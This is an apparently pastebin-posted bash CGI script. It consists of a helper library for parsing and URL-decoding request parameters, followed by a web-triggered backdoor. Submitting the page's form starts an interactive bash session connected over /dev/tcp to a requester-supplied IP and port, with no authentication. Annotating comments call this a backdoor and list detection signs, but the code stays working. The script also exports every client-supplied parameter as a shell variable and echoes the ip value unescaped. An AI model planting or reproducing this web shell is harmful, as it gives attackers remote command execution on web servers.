simaosec

Untitled

Sep 14th, 2017
  1. #!/bin/bash
  2.  
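# Read the body of a POST request from stdin into QUERY_STRING_POST.
#
# Globals:
#   REQUEST_METHOD, CONTENT_LENGTH, CONTENT_TYPE  (read; all come from the request)
#   QUERY_STRING_POST  (written; left untouched when already non-empty)
#   RECEIVED_POST      (written only by the disabled multipart branch)
# Inputs:  the request body on stdin
# Outputs: warnings on stderr
# Returns: 1 when CONTENT_LENGTH is not a decimal number; otherwise the status
#          of the last command run
function cgi_get_POST_vars()
{
  # Only a POST request has a body to read.
  [ "$REQUEST_METHOD" != "POST" ] && return

  # The body can be consumed from stdin once only; keep an earlier result.
  [ -n "$QUERY_STRING_POST" ] && return

  # Without a length there is no way to know how much to read.
  [ -z "$CONTENT_LENGTH" ] && return

  # CONTENT_LENGTH is client-controlled: accept decimal digits only before it
  # is handed to `read -N`.
  if ! [[ "$CONTENT_LENGTH" =~ ^[0-9]+$ ]]; then
    echo "bash.cgi warning: ignoring non-numeric CONTENT_LENGTH" 1>&2
    return 1
  fi

  [ "${CONTENT_TYPE}" != "application/x-www-form-urlencoded" ] && \
    echo "bash.cgi warning: you should probably use MIME type application/x-www-form-urlencoded!" 1>&2

  local handlemultipart=0 # enable to handle multipart/form-data (dangerous?)
  local boundary
  if [[ "$handlemultipart" = "1" && "${CONTENT_TYPE:0:19}" = "multipart/form-data" ]]; then
    # NOTE(review): the boundary is taken from the request header and becomes
    # part of awk's record separator; treat this branch as untrusted-input
    # handling and keep it disabled unless it is reviewed.
    boundary=${CONTENT_TYPE:30}
    # -r keeps backslashes in the body literal instead of treating them as escapes.
    read -r -N "$CONTENT_LENGTH" RECEIVED_POST

    QUERY_STRING_POST=$(printf '%s\n' "$RECEIVED_POST" | awk -v b="$boundary" 'BEGIN { RS=b"\r\n"; FS="\r\n"; ORS="&" }
$1 ~ /^Content-Disposition/ {gsub(/Content-Disposition: form-data; name=/, "", $1); gsub("\"", "", $1); print $1"="$3 }')

  # take input string as is
  else
    # -r keeps backslashes in the body literal instead of treating them as escapes.
    read -r -N "$CONTENT_LENGTH" QUERY_STRING_POST
  fi

  return
}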
  36.  
# (internal) routine to decode a urlencoded string: '+' becomes a space and %XX becomes the byte with hex value XX
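# Decode one application/x-www-form-urlencoded string.
#
# Arguments: $1 - the encoded string (does nothing unless exactly one argument
#                 is given)
# Outputs:   the decoded string on stdout, followed by a newline
#
# '+' becomes a space and %XX (two hex digits) becomes the byte XX. A '%' that
# is not followed by two hex digits is copied through unchanged rather than
# being turned into a "\x.." literal. %00 yields nothing, because a bash
# variable cannot hold a NUL byte.
function cgi_decodevar()
{
  [ $# -ne 1 ] && return
  local rest out hex ch
  rest="${1//+/ }"
  out=""
  while [[ "$rest" == *%* ]]; do
    out+="${rest%%\%*}"   # copy everything before the next '%'
    rest="${rest#*%}"     # drop that part and the '%' itself
    hex="${rest:0:2}"
    if [[ "$hex" =~ ^[0-9A-Fa-f]{2}$ ]]; then
      # printf -v assigns directly, so a decoded newline (%0A) is kept; a
      # command substitution would strip it.
      printf -v ch '%b' "\\x${hex}"
      out+="$ch"
      rest="${rest:2}"
    else
      # Malformed escape: keep the '%' literally and carry on after it.
      out+="%"
    fi
  done
  out+="$rest"
  # printf instead of echo: a value such as "-n" or "-e" must be printed, not
  # taken as an option.
  printf '%s\n' "$out"
  return
}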
  58.  
  59.  
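# Export request parameters as shell variables.
#
# Arguments: $1     - GET, POST or BOTH: which query string(s) to parse
#            $2...  - names of the parameters to export, or ALL for every one
# Globals:   QUERY_STRING, QUERY_STRING_POST (read); one exported variable per
#            accepted parameter (written)
#
# NOTE(review): parameter names and values come from the client. With ALL,
# any name the client sends becomes an exported variable, including names that
# change how later commands behave (PATH, IFS, ...). Callers should pass an
# explicit list of expected names instead of ALL.
function cgi_getvars()
{
  [ $# -lt 2 ] && return
  local q p k v s
  # get query
  case $1 in
    GET)
      [ -n "${QUERY_STRING}" ] && q="${QUERY_STRING}&"
      ;;
    POST)
      cgi_get_POST_vars
      [ -n "${QUERY_STRING_POST}" ] && q="${QUERY_STRING_POST}&"
      ;;
    BOTH)
      [ -n "${QUERY_STRING}" ] && q="${QUERY_STRING}&"
      cgi_get_POST_vars
      [ -n "${QUERY_STRING_POST}" ] && q="${q}${QUERY_STRING_POST}&"
      ;;
  esac
  shift
  s=" $* "

  while [ -n "$q" ]; do
    p="${q%%&*}" # first key=value pair
    k="${p%%=*}" # key (variable name)
    v="${p#*=}"  # value, still urlencoded
    # Strip through the first '&'. The pair itself is not used as the pattern:
    # a backslash or glob character in it would stop the pattern from
    # matching, q would never shrink and the loop would not terminate.
    q="${q#*&}"

    # Only a valid shell identifier can be exported; skip anything else.
    [[ "$k" =~ ^[A-Za-z_][A-Za-z0-9_]*$ ]] || continue

    # decode and assign variable if requested (the name is compared literally)
    if [ "$1" = "ALL" ] || [[ "$s" == *" $k "* ]]; then
      export "$k"="$(cgi_decodevar "$v")"
    fi
  done
  return
}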
  93.  
# Request handler: prints an HTML form and acts on the submitted values.
# There is no authentication or allow-list anywhere in this section.
echo "Content-type: text/html";
echo '';
# Every GET and POST parameter is exported as a shell variable (ALL mode), so
# ip, port and cc2 below are whatever the request supplied.
cgi_getvars BOTH ALL
# Form fields: ip (pre-filled with REMOTE_ADDR), port (default 21) and a hidden
# cc2=8, so any submission of this form satisfies the check further down.
echo "<html> <center> <form action='' method='POST'> <input type=text name=ip value=$REMOTE_ADDR> <input type=text name=port value=21> <input type="hidden" name="cc2" value="8" /><br> <input type=submit name=run value=connect> <font color=red>"

echo "</font><center></html>";
# Backdoor behaviour: when cc2 is 8, an interactive bash is started with stdin,
# stdout and stderr attached to an outbound TCP connection to the
# request-supplied ip and port, running as the web server's CGI user.
# Detection: the web server process spawning `bash -i`, outbound connections
# opened by that child, and an unexpected executable in the CGI directory.
# cc2 is unquoted, so a request without it makes the test print an error.
if [ $cc2 -eq 8 ] ; then
bash -i >& /dev/tcp/$ip/$port 0>&1
fi
# The ip value is written back into the response without HTML escaping.
echo $ip